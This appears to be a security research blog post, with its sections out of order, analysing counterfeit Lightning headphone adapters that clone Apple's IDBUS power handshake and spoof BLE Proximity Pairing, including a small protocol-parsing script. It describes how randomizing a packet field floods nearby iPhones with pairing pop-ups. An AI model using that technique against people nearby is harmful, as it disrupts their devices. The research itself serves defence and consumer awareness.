The Bluetooth Address specifies the address of any device to pair with using Bluetooth Classic. This does not have to be the adapter itself. Once paired, the adapter will stop broadcasting over BLE and maintain the Bluetooth Classic connection. The device model specifies which image and name appear on the connect screen. All the adapters we investigated used the device model 0x0520 to appear as BeatsX earphones. Other possible device models were checked using scripts modified from Hexway’s Apple BLEEE project, resulting in the following, likely incomplete list:

We only tested these ranges of codes, so there are likely other possible values. Any unknown device model results in a screen prompting the user to check for a software update. The user can choose either to check for updates or to proceed with setup.

“Set up with limited functionality.” with unknown device model, where “RingRing” is a cell phone (not headphones)

Changing the unknown field affects whether the dialog pops up at all, pops up and disappears immediately, or stays on the screen as normal. In addition, some values will not result in a pop-up window appearing, depending on the device model advertised. The real purpose of this field is unknown and requires further testing.

Typically, if the pop-up window is closed, then another will not appear until the user turns their screen off and on again. However, if the unique tag field is changed randomly, the pop-up will occur about every 5 seconds after the user closes the previous window. This effectively prevents nearby users from using their devices because they must constantly close these windows. Other purposes for this field may exist but are not known at this time.

The Bluetooth modules found in the adapters implement the Proximity Pairing format for advertising through BLE. These modules are meant to replicate Apple’s W1 or H1 Bluetooth chip that is used in their Bluetooth headphones. The manufacturers of these counterfeit chips advertise the functionality for use in cheap Bluetooth headphones to make the pairing process more seamless. These chips can also use the Proximity Pairing packet format to advise the iPhone of the headphones’ battery level.

Promotional presentation/document for YC1168 Bluetooth chip with pop-up window functionality.

Source: https://zhuanlan.zhihu.com/p/111406089

As a result, these chips are becoming widely used in fake AirPods or Beats headphones, making it more difficult to identify counterfeits. In order to verify legitimate headphones, the user must either check the serial number directly with Apple or recognize the differences in quality, which may be difficult without prior experience. Our bodega Baets adapters came in boxes that looked nearly identical to the Apple version, but without the Apple logo.

Summary of Risks

The use of chips to negotiate drawing power from the device presents a number of risks. Allowing unlicensed devices to connect directly to the hardware presents some threats to Apple’s business model, but even more importantly to the consumer, as it may cause damage to the Apple device. There is no protection circuitry in the adapter that protects the Apple device if the adapter somehow sends too much voltage or current back through the Lightning port. We have observed quick battery drain, but these adapters may also damage the Apple device, which has been shown to happen when using unlicensed charging cables.

The ability to make a window pop up on the device to connect to an unknown device is also a risk. Some Bluetooth devices, like the AirPods Pro, can use Siri and can then read and send messages, make and receive calls, read contacts, and perform other functions that present a security risk. You would not want to let an arbitrary Bluetooth device belonging to someone else access your text messages.

Dialog shown after connecting Bluetooth device disguised as AirPods Pro

The only way to turn off Proximity Pairing and prevent these dialogs is to turn off Bluetooth entirely. Once the dialog appears, the only way to close it is to press the small ‘X’ button. Clicking around the dialog does not get rid of the pop-up window. During testing, if the Apple device tries connecting to the Bluetooth address of headphones that are connected to another device, it will disconnect them. This makes it possible to create a string of events that would make an attack more likely to succeed.

So, if you see an endless stream of random pairing requests on your Apple device, now you know your sole option:

Turn off Bluetooth and keep it off.

– By Jared Gonzales and Joel Cretan

Want to learn how the hardware around you works? Come work with us!

Shoutout to RBS alum Trey Keown for the title of this blog post.


Friendly advice from Red Balloon Security: Just pay the extra $2

Recently, we wanted to use some wired headphones with an iPhone, which sadly lacks a headphone jack. The nearest deli offered a solution: a Lightning-to-headphone jack adapter for only $7. Got to love your local New York City bodega.

But a wrinkle appeared: Plugging in the adapter made the phone pop up a dialog to pair with a BeatsX device, which changed to “Baets” once a Bluetooth connection was established. Shouldn’t this thing be a simple digital-to-analog converter? Why is Bluetooth involved? What makes the iPhone think it’s from Beats? That’s too many questions to ignore: We had to dig into this unexpected embedded device.

And here’s the short take of our analysis: Beware the transposed vowels. “Baets” is not what it wants you to believe it is.

Once connected, the headphones work as if directly plugged into the phone. But we found that Bluetooth must remain on to keep listening, and the phone insists it is connected to a Bluetooth device, called “Baets.” We also noticed the phone’s battery draining much faster than usual.

This mysterious behavior piqued our interest. Red Balloon specializes in embedded security and reverse engineering, so interest gave way to action. We promptly bought a dozen more of the same adapter model to tear down and study.


MFi is MIA

The first thing we noted is none of these adapters has the Apple Made for iPhone/iPad (MFi) chip you’ll find in genuine, approved accessories and cables; Apple licenses that chip to control who is allowed to produce Lightning devices.

Instead, each of these knock-off adapters draws power from the Apple device to power its own Bluetooth module. This module then broadcasts that it is ready to pair with the Apple device, though in fact any nearby device can now pair with it and play audio.

Presumably, using Bluetooth is cheaper than licensing Apple’s chip, which is why the knockoffs cost $2 less than the genuine Apple version.

This initial finding fueled two research objectives: To discover how the adapter convinced the Apple device to power the module; and to discover how the adapter displayed the pop-up window.

How does it receive power?

We encountered three different hardware configurations on these devices; they appear to have many similarities, but it’s unclear if the same manufacturer makes them. One of the variations does not work: It doesn’t appear to power up, generates no pop-ups, and has no Bluetooth Classic connection. But this variation successfully draws power from the Apple device, so the failure is likely in the circuit or Bluetooth chip.

Overall, the hardware is not very complex and lacks components seen in a genuine adapter, including protection circuitry.

First working counterfeit: Lightning to headphone jack

Second working counterfeit: Lightning to headphone jack

Third counterfeit: Lightning to headphone jack (non-functional)

Legitimate Apple adapter. Credit: iFixit

On the active adapters, one side of the PCB holds the Bluetooth chip and antenna. On the other side is a crystal oscillator, which connects to the Bluetooth chip. The Bluetooth chip connects to the accessory power (ACC_PWR) pin of the Lightning connector but does not automatically receive power. The remaining chip negotiates with the Apple device to draw power through the Lightning port. This negotiation chip is vital to enabling power for the Bluetooth module.

Lightning Connector pinout according to patent filing:

https://web.archive.org/web/20190801205452/http://ramtin-amin.fr/tristar.html

In Lightning connectors, the pins on each side of the connector do not mirror each other, so the control chip must identify the orientation of the connector before proceeding. In addition, the Lightning connector has a dynamic pinout controlled by the Lightning port control chip in the Apple device, which negotiates with a security chip in the cable. (Nyan Satan’s research into the Lightning port provides a good baseline for understanding the communication between any accessory and the Apple device).

The female Lightning port control chip is codenamed Hydra (a newer version that replaced the chip codenamed Tristar) and is labeled CBTL1614A1 on the iPhone 12, according to a teardown by iFixit, which identifies it as a multiplexer. Apple guards details on these chips, but some data sheets have leaked in the past, revealing some expected functions. HiFive is the codename of the security chip in the cable, labeled as SN2025 or BQ2025 in male connectors. These chips are available only to MFi-certified manufacturers, and only Apple knows their internal behavior, which is meant to prevent counterfeits. We will focus on the HiFive chip since we found replica versions in our Baets adapters.

The HiFive chip identifies the cable and negotiates for power through the Texas Instruments SDQ protocol, where Apple’s specific implementation is referred to as IDBUS. Our research utilized the SDQAnalyzer plugin for the Saleae Logic Analyzer. The negotiations include identifying information from the accessory and the Apple device. Still, every individual accessory contains unique information that makes it difficult to reverse engineer and counterfeit without being detected.

Replicating the communication of a single, legitimate Apple accessory is enough to draw power. This means that every knockoff chip from the same model identifies itself as the same individual accessory or cable to the Apple device (with the same serial number or unique data as the single cloned cable’s HiFive chip). As a result, an iOS update can block this handshake and break all the devices using the same knockoff chip that shares a single serial number. This may explain why some cheap charging cables and accessories mysteriously stop working or produce error/unlicensed warnings when plugged in. The owner of the legitimate cloned cable may also be out of luck, but the impact would be limited to that individual.

In 2016, electronupdate decapped an earlier version of these third-party chips and revealed a much simpler die than you’ll find in the legitimate TI BQ2025 chip used in authentic Lightning cables.

Decapped third-party chip

http://electronupdate.blogspot.com/2016/09/3rd-party-apple-lightning.html

Authentic TI BQ2025 chip decapped

Credit: 9to5mac.com

Many chips advertise the ability to negotiate power through the Lightning port. Knockoff manufacturers continue to create many variations as old versions stop working. One of our Baets devices uses an unknown chip labeled “24.” The others use the MT821B and 821B, which all share the same accessory serial number. Online posts referencing variations of uncertified power negotiating chips include the CY262, AD139, and ASB260, to name a few. It’s unknown if any of these chips or adapters come from the same manufacturers.

Each chip receives the 2.65V signal from the ACC_ID line and outputs 1.9V to one of the data lines.

Removing the constant high signal from the data line does not affect the negotiation, but the signal is necessary to keep the device powered when the screen is off. Setting the data line consistently high at 1.9V turns on the screen. Some of our adapters do not support driving the data line in both orientations, so the Bluetooth module turns off when the Apple device turns off its screen and stops supplying power.

Communication is half-duplex bidirectional, using the SDQ protocol. Like the 1-Wire protocol, the host and adapter communicate over the ACC_ID line only. The female Lightning port repeatedly sends requests for connected accessories to identify themselves. It alternates the pins of the request to determine the accessory orientation.



After receiving the request, the chip must first identify itself to the Hydra chip. In this proprietary protocol, an even first byte marks a request, and the response code is the request ID + 1. The initial identification request has ID 0x74, so its response code is 0x75. Not all request types are known, but @spbdimka has compiled a list of known commands.
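The request/response rule above is easy to express in code. The sketch below classifies a captured frame by the parity of its first byte and checks its trailing CRC8 byte. The frame layout (code byte, data bytes, one CRC byte) follows the columns of the negotiation table in this post. The CRC parameters are an assumption inferred from the captured frames, not a documented specification: a reflected polynomial of 0x8C with an initial value of 0xFF reproduces the trailing byte of the Get ID request (74 00 02 1F). The function names are hypothetical.

```python
def crc8_idbus(data: bytes) -> int:
    """CRC8 over the code and data bytes.

    Assumed parameters (inferred from captures): reflected polynomial 0x8C,
    initial value 0xFF, no final XOR.
    """
    crc = 0xFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8C if crc & 1 else crc >> 1
    return crc


def is_request(code: int) -> bool:
    """An even first byte marks a request; an odd one marks a response."""
    return code % 2 == 0


def expected_response_code(request_code: int) -> int:
    """The response code is the request code plus one."""
    if not is_request(request_code):
        raise ValueError(f"0x{request_code:02X} is not a request code")
    return request_code + 1


def parse_frame(frame: bytes) -> dict:
    """Split a captured frame into code, data, and CRC, and verify the CRC."""
    if len(frame) < 2:
        raise ValueError("a frame needs at least a code byte and a CRC byte")
    code, data, crc = frame[0], frame[1:-1], frame[-1]
    return {
        "code": code,
        "kind": "request" if is_request(code) else "response",
        "data": data,
        "crc_ok": crc8_idbus(frame[:-1]) == crc,
    }


# The Get ID request from the negotiation capture in this post.
get_id = parse_frame(bytes.fromhex("7400021f"))
print(get_id["kind"], get_id["crc_ok"], hex(expected_response_code(get_id["code"])))
```

Checking the CRC before interpreting a frame helps separate real protocol traffic from decoding errors in a logic analyzer capture.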

Incomplete List of IDBUS Request Types

https://twitter.com/spbdimka/status/1118597972760125440

We observed many of these codes during our investigation. Others are not listed explicitly by @spbdimka but can be inferred since each response is just an incremented code of the request. The encoding of the data is unknown, but we can get a general idea of the process necessary to request power from the device. The adapter responds to these requests with incremented response codes, as expected. The negotiation from that adapter is shown below:

| Request/Response Type | Request/Response Code | Data | CRC8 |

| Get ID | 74 | 00 02 | 1F |

| Parse Get ID | 75 | 11 F0 00 00 00 00 | D6 |

| Get Module State | 72 | | 71 |

| Parse Module State | 73 | 80 00 C0 00 | 87 |